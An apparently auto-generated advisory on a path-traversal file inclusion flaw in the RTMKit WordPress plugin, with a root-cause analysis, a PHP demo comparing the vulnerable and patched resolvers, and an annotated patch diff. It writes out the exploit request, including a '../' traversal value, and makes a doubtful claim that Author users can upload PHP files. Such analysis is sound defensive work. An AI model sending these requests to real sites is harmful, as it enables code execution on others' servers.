Atomic Edge Proof of Concept automated generator using AI diff analysis
Published: May 12, 2026

CVE-2026-3425: RTMKit Addons for Elementor <= 2.0.2 – Authenticated (Author+) Local File Inclusion via 'path' (rometheme-for-elementor)

CVE ID: CVE-2026-3425
Severity: High (CVSS 8.8)
CWE: 98
Vulnerable Version: 2.0.2
Patched Version: 2.0.3
Disclosed: May 11, 2026

Analysis Overview

Atomic Edge analysis of CVE-2026-3425: This vulnerability allows authenticated attackers with Author-level access to include and execute arbitrary PHP files through the 'path' parameter of the 'get_content' AJAX action in the RTMKit Addons for Elementor plugin, affecting versions up to and including 2.0.2, with a CVSS score of 8.8.

The root cause is the `get_content` method in `/rometheme-for-elementor/Inc/Core/PluginApi.php` (lines 59-74 in the vulnerable version). The original code concatenated the user-supplied `$_POST['path']` directly into a file path without validating which menu entry it belonged to: `$file = RTM_KIT_DIR . 'views/' . $path . '.php';`. The only check was whether the resulting file existed, via `file_exists($file)`. Beyond nonce verification there was no authorization check, so any authenticated user who could obtain the nonce (which is exposed on admin pages accessible to the Author role) could trigger the function.

The attack vector uses the WordPress AJAX endpoint `/wp-admin/admin-ajax.php`. An attacker sends a POST request with `action=get_content`, `nonce=`, and `path=../../wp-content/uploads/malicious`. The plugin builds the file path by prepending `RTM_KIT_DIR . 'views/'` and appending `.php`, but `../` sequences in `path` escape the intended `views/` directory. Author-level users can upload PHP files (e.g., via the WordPress media uploader or plugin/theme editors) and then include them through this traversal to achieve code execution.

The patch adds two critical protections. First, it inserts an authorization check before any path processing: `if (!current_user_can('manage_options')) { wp_send_json_error('Access Denied.'); … }`. This restricts the function to users with the `manage_options` capability, i.e. administrators. Second, it replaces the direct path concatenation with a menu-based lookup. Instead of accepting an arbitrary path string, the handler passes `$_POST['path']` to `get_menu_by_path()` (added in `/rometheme-for-elementor/Inc/Modules/Menu.php`), which searches the internal menu array for a matching key and returns the matching menu entry; that entry's `render_view` value is the only file path the handler will load. This ensures only predefined view files can be included.

Successful exploitation allows an authenticated attacker to achieve Remote Code Execution by including arbitrary PHP files present on the server. This can bypass access controls, retrieve sensitive database credentials from configuration files, or execute malicious code uploaded via other means. The inclusion can also expose sensitive data through PHP error messages or direct output of non-PHP files interpreted as PHP.
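
The two path-resolution strategies contrasted above, as an added PHP example (not code from the RTMKit plugin): a reduced model of the 2.0.2 concatenation beside the 2.0.3 menu-key lookup, plus a `realpath()` containment check as defence in depth. The scratch directory standing in for `RTM_KIT_DIR`, the reduced menu table and the request values are constructed for the demonstration.

```php
<?php
// Added example (not RTMKit code): models the 2.0.2 path construction in
// PluginApi::get_content() beside the 2.0.3 menu-key lookup, and adds a
// realpath() containment check as defence in depth. Runs stand-alone.
declare(strict_types=1);

// Stand-in for the plugin's RTM_KIT_DIR: a scratch directory (assumption).
$rtmKitDir = rtrim(sys_get_temp_dir(), '/\\') . '/rtmkit-demo-' . getmypid() . '/';
mkdir($rtmKitDir . 'views', 0700, true);
file_put_contents($rtmKitDir . 'views/dashboard.php', "<?php echo 'dashboard';\n");
file_put_contents($rtmKitDir . 'views/widgets.php',   "<?php echo 'widgets';\n");
// Constructed file outside views/, standing in for any non-view PHP file.
file_put_contents($rtmKitDir . 'outside.php', "<?php echo 'not a view';\n");

// 2.0.2 behaviour: concatenate the request value and only test existence.
function resolve_vulnerable(string $dir, string $path): ?string
{
    $file = $dir . 'views/' . $path . '.php';
    return file_exists($file) ? $file : null;
}

// Reduced copy of the nested menu table from Menu.php; only 'render_view'
// values can ever become an include target.
function menu_table(string $dir): array
{
    return [
        'dashboard' => [
            'dashboard' => ['capability' => 'manage_options',
                            'render_view' => $dir . 'views/dashboard.php'],
        ],
        'features' => [
            'widgets' => ['capability' => 'manage_options',
                          'render_view' => $dir . 'views/widgets.php'],
        ],
    ];
}

// Same recursive any-depth key search as the patch's findByKey().
function find_by_key(array $array, string $searchKey)
{
    foreach ($array as $key => $value) {
        if ($key === $searchKey) {
            return $value;
        }
        if (is_array($value)) {
            $found = find_by_key($value, $searchKey);
            if ($found !== null) {
                return $found;
            }
        }
    }
    return null;
}

// 2.0.3 behaviour: the request value is a lookup key, never a path fragment.
function resolve_patched(string $dir, string $path): ?string
{
    $entry = find_by_key(menu_table($dir), $path);
    if (is_array($entry) && isset($entry['render_view']) && file_exists($entry['render_view'])) {
        return $entry['render_view'];
    }
    return null;
}

// Defence in depth: whatever the resolver returns must live under views/.
function is_within_views(string $dir, string $file): bool
{
    $viewsReal = realpath($dir . 'views');
    $fileReal  = realpath($file);
    if ($viewsReal === false || $fileReal === false) {
        return false;
    }
    $prefix = $viewsReal . DIRECTORY_SEPARATOR;
    return strncmp($fileReal, $prefix, strlen($prefix)) === 0;
}

// Constructed request values: two valid keys, a traversal fragment, and two
// non-menu keys that the any-depth search happens to match at leaf level.
$inputs = ['dashboard', 'widgets', '../outside', 'capability', 'render_view'];
printf("%-12s %-28s %-28s %s\n", 'path', '2.0.2 resolves to', '2.0.3 resolves to', '2.0.2 in views/');
foreach ($inputs as $input) {
    $old = resolve_vulnerable($rtmKitDir, $input);
    $new = resolve_patched($rtmKitDir, $input);
    printf("%-12s %-28s %-28s %s\n",
        $input,
        $old === null ? '(none)' : substr($old, strlen($rtmKitDir)),
        $new === null ? '(none)' : substr($new, strlen($rtmKitDir)),
        $old !== null && is_within_views($rtmKitDir, $old) ? 'yes' : 'no');
}

// Clean up the scratch directory.
foreach (['views/dashboard.php', 'views/widgets.php', 'outside.php'] as $f) {
    unlink($rtmKitDir . $f);
}
rmdir($rtmKitDir . 'views');
rmdir($rtmKitDir);
```

The traversal row shows the 2.0.2 resolver accepting a file that exists but fails the containment check, while the 2.0.3 resolver returns nothing for every value that is not a menu key with a `render_view`.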

Differential between vulnerable and patched code

Below is a differential between the unpatched vulnerable code and the patched update, for reference.

Code Diff
--- a/rometheme-for-elementor/Inc/Core/PluginApi.php
+++ b/rometheme-for-elementor/Inc/Core/PluginApi.php
@@ -37,6 +37,12 @@
         // Load the sidebar view file

         check_ajax_referer('rtmkit_nonce', 'nonce');
+
+        if (!current_user_can('manage_options')) {
+            wp_send_json_error('Access Denied.');
+            wp_die();
+        }
+
         if (!file_exists(RTM_KIT_DIR . 'views/sidebar.php')) {
             wp_send_json_error('Sidebar view file not found.');
             return;
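Review bot: the `wp_die();` following `wp_send_json_error('Access Denied.');` is unreachable, because `wp_send_json_error()` already terminates the request through `wp_die()`; it is harmless, but the same redundant line is repeated in every capability check this patch adds and can be dropped throughout. The capability check itself is the right guard for the sidebar loader.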
@@ -50,15 +56,23 @@
     public function get_content()
     {
         check_ajax_referer('rtmkit_nonce', 'nonce');
+        if (!current_user_can('manage_options')) {
+            wp_send_json_error('Access Denied.');
+            wp_die();
+        }
+        $path = sanitize_text_field($_POST['path']);
+        $menus = RTMKitModulesMenu::instance()->get_menu_by_path($_POST['path']);

         if (!isset($_POST['path'])) {
             wp_send_json_error('Path not specified.');
             return;
         }
-        $path = sanitize_text_field($_POST['path']);
-        $file = RTM_KIT_DIR . 'views/' . $path . '.php';
-        if (!file_exists($file)) {
-            return '';
+
+        if (isset($menus['render_view']) && file_exists($menus['render_view'])) {
+            $file = $menus['render_view'];
+        } else {
+            wp_send_json_error('View file not found for the specified path.');
+            return;
         }
         ob_start();
         require_once $file;
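Review bot: `$_POST['path']` is read on the two new lines (`sanitize_text_field(...)` and `get_menu_by_path(...)`) before the existing `if (!isset($_POST['path']))` guard, so a request without `path` now produces an undefined-index notice and, since `get_menu_by_path(string $path)` declares a non-nullable string parameter, a TypeError before 'Path not specified.' can ever be sent; move the `isset` check above the new lines. The sanitised `$path` is also computed but never used: the raw `$_POST['path']` is what is passed to `get_menu_by_path()`, so pass `$path` instead. The allow-list approach itself is sound, since `$file` can now only take a `render_view` value from the menu table.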
--- a/rometheme-for-elementor/Inc/Elements/PricingTable.php
+++ b/rometheme-for-elementor/Inc/Elements/PricingTable.php
@@ -24,8 +24,7 @@
         $icon = 'rkit-widget-icon ' . $this->get_widget_data()['icon'];
         return $icon;
     }
-
-
+
     public function get_categories()
     {
         return ['romethemekit_widgets'];
--- a/rometheme-for-elementor/Inc/Elements/SocialIcon.php
+++ b/rometheme-for-elementor/Inc/Elements/SocialIcon.php
@@ -74,9 +74,9 @@
                 'pointer-on-hover' => esc_html('Pointer On Hover'),
             ],
             'default' => 'flat',
-            'condition' => [
-                'select_color' => 'official'
-            ]
+            // 'condition' => [
+            //     'select_color' => 'official'
+            // ]
         ]);

         $ss = new ElementorRepeater();
@@ -472,6 +472,17 @@
             ]
         ]);

+         $this->add_control('social_pointer_color_normal', [
+            'label' => esc_html('Pointer Color'),
+            'type'  => ElementorControls_Manager::COLOR,
+            'selectors' => [
+                '{{WRAPPER}} .rkit-social-share__link' => '--color:{{VALUE}}'
+            ],
+            'condition' => [
+                'select_skin' => ['pointer', 'pointer-on-hover']
+            ]
+        ]);
+
         $this->add_group_control(
             ElementorGroup_Control_Background::get_type(),
             [
@@ -522,6 +533,17 @@
             ]
         ]);

+        $this->add_control('social_pointer_color_normal', [
+            'label' => esc_html('Pointer Color'),
+            'type'  => ElementorControls_Manager::COLOR,
+            'selectors' => [
+                '{{WRAPPER}} .rkit-social-share__link:hover' => '--color:{{VALUE}}'
+            ],
+            'condition' => [
+                'select_skin' => ['pointer', 'pointer-on-hover']
+            ]
+        ]);
+
         $this->add_group_control(
             ElementorGroup_Control_Background::get_type(),
             [
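Review bot: both new `add_control()` calls (one in the `@@ -472` hunk, one in this `@@ -522` hunk) register the same control id `social_pointer_color_normal`; the second targets the `:hover` selector and presumably should be `social_pointer_color_hover`, otherwise Elementor reports a duplicate control id and only one of the two colours can be set. The first call is also indented one space deeper than the surrounding code.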
--- a/rometheme-for-elementor/Inc/Modules/Helper/EditorCanvas.php
+++ b/rometheme-for-elementor/Inc/Modules/Helper/EditorCanvas.php
@@ -26,23 +26,34 @@
             add_action('wp_ajax_get_installed_templates', [$this, 'get_installed_templates']);
             add_action('wp_ajax_get_installed_template', [$this, 'get_installed_template']);
             add_action('wp_ajax_get_template_content', [$this, 'get_template_content']);
-            add_action('wp_ajax_is_pro_active' , [$this , 'is_pro_active']);
+            add_action('wp_ajax_is_pro_active', [$this, 'is_pro_active']);
         }
     }

-    public function is_pro_active() {
-        check_ajax_referer('rtmkit_nonce' , 'nonce');
+    public function is_pro_active()
+    {
+        check_ajax_referer('rtmkit_nonce', 'nonce');

         wp_send_json_success(RTMKitCorePlugin::instance()->pro_is_active());
     }

     public function template_category()
     {
+        check_ajax_referer('rtmkit_nonce', 'nonce');
+        if (!current_user_can('manage_options')) {
+            wp_send_json_error('Access Denied.');
+            wp_die();
+        }
         wp_send_json_success(RTMKitModulesTemplatekitsTemplatekitAPI::instance()->get_template_categories());
     }

     public function fetch_lib()
     {
+        check_ajax_referer('rtmkit_nonce', 'nonce');
+        if (!current_user_can('manage_options')) {
+            wp_send_json_error('Access Denied.');
+            wp_die();
+        }
         wp_send_json_success(RTMKitModulesTemplatekitsTemplatekitAPI::instance()->_get_template_data('templatekits'));
     }

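Review bot: `template_category()` and `fetch_lib()` gain the nonce and `manage_options` checks, but the registration block at the top of the hunk also wires `get_installed_templates`, `get_installed_template` and `get_template_content`, none of which appear in this patch, and `is_pro_active()` still carries only the nonce check. Confirm the three template handlers were reviewed for the same missing capability check and, if the template listing is meant to be admin-only, apply the same guard there.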
--- a/rometheme-for-elementor/Inc/Modules/Menu.php
+++ b/rometheme-for-elementor/Inc/Modules/Menu.php
@@ -42,6 +42,7 @@
                     'function' => [$this, 'rtmkit_root_page'],
                     'icon_url' => RTM_KIT_URL . 'assets/images/romethemekit.svg',
                     'position' => 20,
+                    'render_view' => RTM_KIT_DIR . 'views/dashboard.php',
                 ],
             ],

@@ -51,60 +52,69 @@
                     'capability' => 'manage_options',
                     'menu_slug' => 'rtmkit&path=widgets',
                     'function' => [$this, 'rtmkit_root_page'],
+                    'render_view' => RTM_KIT_DIR . 'views/widgets.php',
                 ],
                 'modules' => [
                     'title' => __('Modules', 'rometheme-for-elementor'),
                     'capability' => 'manage_options',
                     'menu_slug' => 'rtmkit&path=modules',
                     'function' => [$this, 'rtmkit_root_page'],
+                    'render_view' => RTM_KIT_DIR . 'views/modules.php',
                 ],
                 'themebuilder' => [
                     'title' => __('Theme Builder', 'rometheme-for-elementor'),
                     'capability' => 'manage_options',
                     'menu_slug' => 'rtmkit&path=themebuilder',
                     'function' => [$this, 'rtmkit_root_page'],
+                    'render_view' => RTM_KIT_DIR . 'views/themebuilder.php',
                 ],
                 'templates' => [
                     'title' => __('Template Kits', 'rometheme-for-elementor'),
                     'capability' => 'manage_options',
                     'menu_slug' => 'rtmkit&path=templates',
                     'function' => [$this, 'rtmkit_root_page'],
+                    'render_view' => RTM_KIT_DIR . 'views/templates.php',
                 ],
             ],

             'settings' => [
-                'settings' => [
+                'global-kit-setup' => [
                     'title' => __('Global Kit Setup', 'rometheme-for-elementor'),
                     'capability' => 'manage_options',
-                    'menu_slug' => 'rtmkit&path=settings',
+                    'menu_slug' => 'rtmkit&path=global-kit-setup',
                     'function' => [$this, 'rtmkit_root_page'],
+                    'render_view' => RTM_KIT_DIR . 'views/settings.php',
                 ],
                 'updates' => [
                     'title' => __('Version Controls', 'rometheme-for-elementor'),
                     'capability' => 'manage_options',
                     'menu_slug' => 'rtmkit&path=updates',
                     'function' => [$this, 'rtmkit_root_page'],
+                    'render_view' => RTM_KIT_DIR . 'views/updates.php',
                 ],
             ],

             'information' => [
                 'submission' => [
-                    'title' => __('Submission', 'rometheme-for-elementor'),
+                    'title' => __('Submissions', 'rometheme-for-elementor'),
                     'capability' => 'manage_options',
                     'menu_slug' => 'rtmkit&path=submission',
                     'function' => [$this, 'rtmkit_root_page'],
+                    'render_view' => RTM_KIT_DIR . 'views/submission.php',
                 ],
                 'system-status' => [
                     'title' => __('System Info', 'rometheme-for-elementor'),
                     'capability' => 'manage_options',
                     'menu_slug' => 'rtmkit&path=system-status',
                     'function' => [$this, 'rtmkit_root_page'],
+                    'render_view' => RTM_KIT_DIR . 'views/system-status.php',
                 ],
                 'documentation' => [
                     'title' => __('Help & Center', 'rometheme-for-elementor'),
                     'capability' => 'read',
                     'menu_slug' => 'rtmkit&path=help',
                     'function' => [$this, 'rtmkit_root_page'],
+                    'render_view' => RTM_KIT_DIR . 'views/help.php',
                 ],
             ],
         ];
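Review bot: `get_menu_by_path()` matches on the array key, and the `settings` entry was renamed to `global-kit-setup` so that key and `menu_slug` agree, but the `documentation` entry keeps key `documentation` while its slug is `rtmkit&path=help`; a `get_content` request for `path=help` will therefore find no entry and the Help page content cannot load. Rename the key to `help` or look up by slug. Separately, that entry is registered with `'capability' => 'read'` while `get_content()` now requires `manage_options`, so non-admin users who can see the Help menu can no longer fetch its view; either policy is defensible, but the two should agree.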
@@ -235,7 +245,7 @@
         $wp_admin_bar->add_node([
             'id' => 'rtmkit_submission',
             'parent' => 'rtmkit_menu_bar',
-            'title' => 'Submission',
+            'title' => 'Submissions',
             'href' => admin_url('admin.php?page=rtmkit&path=submission'),
         ]);

@@ -369,4 +379,31 @@
             wp_enqueue_script('rtmkit-new-features', RTM_KIT_URL . 'assets/js/rtmkit-new-feature.js', [], RTM_KIT_VERSION, true);
         }
     }
+
+    protected function findByKey(array $array, string $searchKey)
+    {
+        foreach ($array as $key => $value) {
+
+            // Kalau key ketemu
+            if ($key === $searchKey) {
+                return $value;
+            }
+
+            // Kalau value masih array, lanjut cari ke dalam
+            if (is_array($value)) {
+                $result = $this->findByKey($value, $searchKey);
+                if ($result !== null) {
+                    return $result;
+                }
+            }
+        }
+
+        return null;
+    }
+
+    public function get_menu_by_path(string $path)
+    {
+        $menus = $this->get_menus();
+        return $this->findByKey($menus, $path);
+    }
 }
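Review bot: `findByKey()` returns the value of the first key equal to `$searchKey` at any depth, so `path` values such as `title`, `capability`, `function` or `render_view` match leaf keys of a menu entry and return a string or callable rather than a menu array, and a group key such as `settings` returns the whole group. The caller survives this only because `isset($menus['render_view'])` happens to be false for those values; make the contract explicit by returning only values that are arrays containing `render_view`, or key the lookup on a flat slug-to-view map. Minor: a matched key whose value is `null` is skipped by the `!== null` test and the search continues past it.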
--- a/rometheme-for-elementor/Inc/Modules/Themebuilder/ThemebuilderAPI.php
+++ b/rometheme-for-elementor/Inc/Modules/Themebuilder/ThemebuilderAPI.php
@@ -20,6 +20,7 @@
             add_action('wp_ajax_get_themebuilder_table', [$this, 'get_themebuilder_table']);
             add_action('wp_ajax_add_themebuilder', [$this, 'add_themebuilder']);
             add_action('wp_ajax_edit_themebuilder', [$this, 'edit_themebuilder']);
+            add_action('wp_ajax_install_requirements', [$this, 'install_requirements']);
         }
     }

@@ -126,4 +127,46 @@
             wp_send_json_error('Failed Save Template');
         }
     }
+
+    public function install_requirements()
+    {
+        if (!current_user_can('manage_options')) {
+            wp_die();
+        }
+
+         check_ajax_referer('rtmkit_nonce', 'nonce');
+
+        include_once ABSPATH . 'wp-admin/includes/plugin.php';
+        include_once ABSPATH . 'wp-admin/includes/file.php';
+        include_once ABSPATH . 'wp-admin/includes/misc.php';
+        include_once ABSPATH . 'wp-admin/includes/class-wp-upgrader.php';
+
+        $plugin = $_POST['plugin'];
+        $plugin_file = WP_PLUGIN_DIR . '/' . $plugin;
+        $plugin_slug = dirname($plugin);
+
+        if (file_exists($plugin_file)) {
+            // Activate the plugin if already installed but inactive
+            ob_start();
+            activate_plugin($plugin);
+            ob_clean();
+            ob_end_clean();
+            wp_send_json_success("Install and Activate Successfully");
+        } else {
+            ob_start();
+            $plugin_download_url = "https://downloads.wordpress.org/plugin/{$plugin_slug}.latest-stable.zip"; // Adjust URL structure
+            $upgrader = new Plugin_Upgrader();
+            $result = $upgrader->install($plugin_download_url);
+
+            if (is_wp_error($result)) {
+                wp_send_json_error();
+            }
+            $activate_result = activate_plugin($plugin);
+            if (is_wp_error($activate_result)) {
+                wp_send_json_error('Plugin installed but failed to activate: ' . $activate_result->get_error_message());
+            }
+
+            wp_send_json_success('Plugin installed and activated successfully.');
+        }
+    }
 }
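Review bot: `$plugin = $_POST['plugin'];` is used unvalidated to build `$plugin_file`, to derive the download URL via `dirname($plugin)`, and as the argument to `activate_plugin()`, so an administrator-level request can install and activate any plugin from wordpress.org. Since the method is `install_requirements`, the set of expected plugins is fixed: compare `$_POST['plugin']` against that allow-list and reject anything else. Two smaller points: `Plugin_Upgrader::install()` returns `false` (not a `WP_Error`) on some failures, so the `is_wp_error($result)` test alone lets a failed install fall through to `activate_plugin()`; and the default upgrader skin echoes HTML into the `ob_start()` buffer that is never discarded before `wp_send_json_success()`, so use `new Plugin_Upgrader(new Automatic_Upgrader_Skin())` or call `ob_end_clean()` before sending JSON. The stray extra space before `check_ajax_referer` is a style nit.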
--- a/rometheme-for-elementor/Inc/Modules/Themebuilder/ThemebuilderModule.php
+++ b/rometheme-for-elementor/Inc/Modules/Themebuilder/ThemebuilderModule.php
@@ -113,11 +113,9 @@
             return true;
         }

-        // Pastikan struktur include/exclude ada
         $includes = isset($conditions['include']) ? (array) $conditions['include'] : [];
         $excludes = isset($conditions['exclude']) ? (array) $conditions['exclude'] : [];

-        // 🔹 Helper function: cek apakah kondisi cocok
         $match_condition = function ($cond) {

             if (empty($cond['page'])) {
@@ -127,124 +125,224 @@
             $page = $cond['page'];
             $sub  = isset($cond['sub']) ? $cond['sub'] : [];

-            // === 🔸 ENTIRE SITE ===
+            $normalize = function ($val) {
+                if ($val === true || $val === null || $val === '') {
+                    return [true];
+                }
+                return is_array($val) ? $val : [$val];
+            };
+
+            // ===== ENTIRE =====
             if ($page === 'entire') {
                 return true;
             }

-            // === 🔸 ARCHIVES ===
+            // ===== ARCHIVES =====
             if ($page === 'archives' && (is_archive() || is_home())) {
+
                 if (empty($sub)) return true;

                 foreach ($sub as $key => $val) {
+
                     switch ($key) {
+
                         case 'all':
                             return true;
+
                         case 'author':
-                            if (is_author($val)) return true;
+                            foreach ($normalize($val) as $v) {
+                                if (is_author($v)) return true;
+                            }
                             break;
+
                         case 'search':
                             if (is_search()) return true;
                             break;
+
                         case 'post_archive':
                             if (is_home()) return true;
                             break;
+
                         case 'categories':
-                            if (is_category($val)) return true;
+                            foreach ($normalize($val) as $v) {
+                                if (is_category($v)) return true;
+                            }
                             break;
+
                         case 'tags':
-                            if (is_tag($val)) return true;
+                            foreach ($normalize($val) as $v) {
+                                if (is_tag($v)) return true;
+                            }
                             break;
                     }
                 }
+
+                return false;
             }

-            // === 🔸 SINGULAR ===
+            // ===== SINGULAR =====
             if ($page === 'singular' && is_singular()) {
+
                 if (empty($sub)) return true;

                 foreach ($sub as $key => $val) {
+
                     switch ($key) {
+
                         case 'all':
                             return true;
+
                         case 'front_page':
                             if (is_front_page() || (is_home() && !is_paged())) return true;
                             break;

                         case 'posts':
-                            if (get_post_type() === 'post' && (empty($val) || get_the_ID() == $val)) return true;
+                            if (get_post_type() === 'post') {
+                                foreach ($normalize($val) as $v) {
+                                    if ($v === true || get_the_ID() == $v) return true;
+                                }
+                            }
                             break;
+
                         case 'pages':
-                            if (get_post_type() === 'page' && (empty($val) || get_the_ID() == $val)) return true;
+                            if (get_post_type() === 'page') {
+                                foreach ($normalize($val) as $v) {
+                                    if ($v === true || get_the_ID() == $v) return true;
+                                }
+                            }
                             break;
+
                         case 'post_category':
-                            if (is_single() && has_category($val)) return true;
+                            if (is_single()) {
+                                foreach ($normalize($val) as $v) {
+                                    if (has_category($v)) return true;
+                                }
+                            }
                             break;
+
                         case 'post_tag':
-                            if (is_single() && has_tag($val)) return true;
+                            if (is_single()) {
+                                foreach ($normalize($val) as $v) {
+                                    if (has_tag($v)) return true;
+                                }
+                            }
                             break;
+
                         case 'post_author':
-                            if (is_single() && get_post_field('post_author', get_the_ID()) == $val) return true;
+                            if (is_single()) {
+                                foreach ($normalize($val) as $v) {
+                                    if (get_post_field('post_author', get_the_ID()) == $v) return true;
+                                }
+                            }
                             break;
+
                         case 'page_author':
-                            if (is_page() && get_post_field('post_author', get_the_ID()) == $val) return true;
-                            break;
-                        case 'author':
-                            if (is_author($val)) return true;
+                            if (is_page()) {
+                                foreach ($normalize($val) as $v) {
+                                    if (get_post_field('post_author', get_the_ID()) == $v) return true;
+                                }
+                            }
                             break;
                     }
                 }
+
+                return false;
             }

-            // === 🔸 WOO ===
+            // ===== WOOCOMMERCE =====
             if ($page === 'woocommerce' && function_exists('is_woocommerce')) {
+
                 if (empty($sub)) return is_woocommerce();

                 foreach ($sub as $key => $val) {
+
                     switch ($key) {
+
                         case 'shop':
                             if (is_shop()) return true;
                             break;
+
                         case 'product_archive':
                             if (is_post_type_archive('product')) return true;
                             break;
+
                         case 'single_product':
-                            if (is_product() && (empty($val) || get_the_ID() == $val)) return true;
+                            if (is_product()) {
+                                foreach ($normalize($val) as $v) {
+                                    if ($v === true || get_the_ID() == $v) return true;
+                                }
+                            }
                             break;
+
                         case 'product_categories':
-                            if (is_product_category($val)) return true;
+                            foreach ($normalize($val) as $v) {
+                                if (is_product_category($v)) return true;
+                            }
                             break;
+
                         case 'product_tags':
-                            if (is_product_tag($val)) return true;
+                            foreach ($normalize($val) as $v) {
+                                if (is_product_tag($v)) return true;
+                            }
                             break;
+
                         case 'product_author':
-                            if (is_singular('product') && get_post_field('post_author', get_the_ID()) == $val) return true;
+                            if (is_singular('product')) {
+                                foreach ($normalize($val) as $v) {
+                                    if (get_post_field('post_author', get_the_ID()) == $v) return true;
+                                }
+                            }
                             break;
                     }
                 }
+
+                return false;
             }
-            // === 🔸 404 ===
+
+            // ===== 404 =====
             if ($page === 'error_404' && is_404()) {
                 return true;
             }

             return false;
         };
-        // 🔹 Jika ada kondisi EXCLUDE yang cocok → langsung FALSE
-        foreach ($excludes as $cond) {
-            if ($match_condition($cond)) {
+
+        // ===== INCLUDE FIRST =====
+        if (!empty($includes)) {
+
+            $includeMatched = false;
+
+            foreach ($includes as $cond) {
+                if ($match_condition($cond)) {
+                    $includeMatched = true;
+                    break;
+                }
+            }
+
+            if (!$includeMatched) {
                 return false;
             }
+
+            // jika include match, cek exclude
+            foreach ($excludes as $cond) {
+                if ($match_condition($cond)) {
+                    return false;
+                }
+            }
+
+            return true;
         }
-        // 🔹 Jika ada kondisi INCLUDE yang cocok → TRUE
-        foreach ($includes as $cond) {
+
+        // ===== ONLY EXCLUDE =====
+        foreach ($excludes as $cond) {
             if ($match_condition($cond)) {
-                return true;
+                return false;
             }
         }
+
         return true;
     }
-
+
     public function load_themebuilder()
     {
         $active_themebuilder = RTMKitModulesThemebuilderThemebuilderStorage::instance()->get_active_themebuilder();
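Review bot: the include/exclude rewrite changes behaviour, not only layout. Previously a condition set whose `include` list matched nothing still returned `true` (the trailing `return true;` was reached whenever no exclude matched), so includes were effectively ignored; now a non-empty `include` list must match or the result is `false`. That is very likely the intended semantics, but it belongs in the changelog, since saved theme-builder conditions that previously rendered everywhere will now stop rendering. Two follow-ups: `$normalize()` maps an empty value to `[true]`, and the `posts`, `pages` and `single_product` branches test `$v === true` explicitly, but the `author`, `categories`, `tags`, `product_categories` and `product_tags` branches pass `true` straight into `is_author()`, `is_category()` and friends and rely on loose comparison inside WordPress; handle `$v === true` explicitly there too. And `case 'author'` under SINGULAR was removed without replacement; confirm no stored conditions use it.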
--- a/rometheme-for-elementor/Inc/Modules/Widgets/WidgetModule.php
+++ b/rometheme-for-elementor/Inc/Modules/Widgets/WidgetModule.php
@@ -19,6 +19,7 @@
         RTMKitModulesWidgetsWidgetStorage::instance()->init();
         add_action('elementor/elements/categories_registered', [$this, 'add_elementor_widget_categories']);
         add_action('wp_enqueue_scripts', [$this, 'enqueue_widget_style'], 1);
+        add_action('elementor/editor/before_enqueue_scripts', [$this, 'pro_js']);
         new RTMKitModulesHelperSavedTemplateEditor();
     }

@@ -142,4 +143,17 @@
 <?php
         }
     }
+
+    function pro_js()
+    {
+        $list_widgets_pro = RTMKitModulesWidgetsWidgetStorage::instance()->get_widget_data("pro");
+
+        if (ElementorPlugin::$instance->editor->is_edit_mode()) {
+            wp_enqueue_script('rtmprojs', RTM_KIT_URL . 'assets/js/rtmwp.js', ['jquery' , 'wp-i18n'], RTM_KIT_VERSION, true);
+            wp_localize_script('rtmprojs', 'rtmpro', [
+                'is_pro' =>  RTMKitCorePlugin::instance()->pro_is_active() ? 'true' : 'false',
+                'widgets' => $list_widgets_pro
+            ]);
+        }
+    }
 }
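Review bot: `function pro_js()` is declared without a visibility modifier, unlike every other method in this class; make it `public function pro_js()` since it is registered as an action callback.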
--- a/rometheme-for-elementor/Inc/Modules/Widgets/WidgetStorage.php
+++ b/rometheme-for-elementor/Inc/Modules/Widgets/WidgetStorage.php
@@ -182,6 +182,11 @@
         // Cek keamanan nonce
         check_ajax_referer('rtmkit_nonce', 'nonce');

+        if (!current_user_can('manage_options')) {
+            wp_send_json_error('Access Denied.');
+            wp_die();
+        }
+
         // Ambil body JSON
         $rawInput = file_get_contents('php://input');
         $dataJson = json_decode($rawInput, true);
@@ -280,6 +285,10 @@
     {
         // Cek keamanan nonce
         check_ajax_referer('rtmkit_nonce', 'nonce');
+        if (!current_user_can('manage_options')) {
+            wp_send_json_error('Access Denied.');
+            wp_die();
+        }

         delete_option('rkit-widget-options');

--- a/rometheme-for-elementor/Inc/Themebuilder/HeaderFooter.php
+++ b/rometheme-for-elementor/Inc/Themebuilder/HeaderFooter.php
@@ -77,7 +77,7 @@
                         RTMKitModulesThemebuilderThemebuilderStorage::instance()->get_themebuilder_content($header_id)
                     );
                 echo $fullHeader;
-                break;
+                // break;
             }
         }
     }
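Review bot: commenting out `break;` makes the loop continue past the first matching header, so every matching header template is now echoed; if that is intended, delete the line rather than leaving `// break;` behind, and if not, this is a rendering regression.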
--- a/rometheme-for-elementor/RomeTheme.php
+++ b/rometheme-for-elementor/RomeTheme.php
@@ -3,20 +3,20 @@
 /**
  * Plugin Name:       RTMKit Addons for Elementor
  * Description:      The best toolkit solution for Elementor. Enjoy advanced addons, theme builders, forms, icons, and ready-made templates to create stunning websites quickly and effortlessly.
- * Version:           2.0.2
+ * Version:           2.0.3
  * Author:            Rometheme
  * Author URI: 	  	  https://rometheme.net/
  * License : 		  GPLv3 or later
  * Requires Plugins : elementor
- * Elementor tested up to: 3.30.2
- * Elementor Pro tested up to: 3.30.0
+ * Elementor tested up to: 3.35.0
+ * Elementor Pro tested up to: 3.35.0
  * Text Domain:      rometheme-for-elementor
  * The best toolkit solution for Elementor. Enjoy advanced addons, theme builders, forms, icons, and ready-made templates to create stunning websites quickly and effortlessly.
  */
 if (!defined('ABSPATH')) {
     exit; // Exit if accessed directly
 }
-defined('RTM_KIT_VERSION') || define('RTM_KIT_VERSION', '2.0.2');
+defined('RTM_KIT_VERSION') || define('RTM_KIT_VERSION', '2.0.3');
 defined('RTM_KIT_DIR') || define('RTM_KIT_DIR', plugin_dir_path(__FILE__));
 defined('RTM_KIT_URL') || define('RTM_KIT_URL', plugin_dir_url(__FILE__));
 defined('RTM_KIT_FILE') || define('RTM_KIT_FILE', __FILE__);
--- a/rometheme-for-elementor/views/dashboard.php
+++ b/rometheme-for-elementor/views/dashboard.php
@@ -91,10 +91,10 @@
                     </div>
                 </div>
                 <div class="col-sm-5 col-md-5 col-lg-5 col-xl-5 col-4 col-xxl-4">
-                    <div class="card rounded-4 text-center  flex-column justify-content-center align-items-center gap-3 p-2 h-100" style="background-image: url(<?php echo esc_url(RTM_KIT_URL . 'assets/images/banner-bg.png') ?>); background-size:cover; background-repeat:no-repeat;">
-                        <span class="accent-color fs-5">UPGRADE TO PRO</span>
-                        <h1 class="m-0 fw-light fs-1 text-center lh-1">Unlock Now<br /><span class="fw-bold fs-1 lh-1 text-white">Hi-End Power</span></h1>
-                        <span class="text-white">
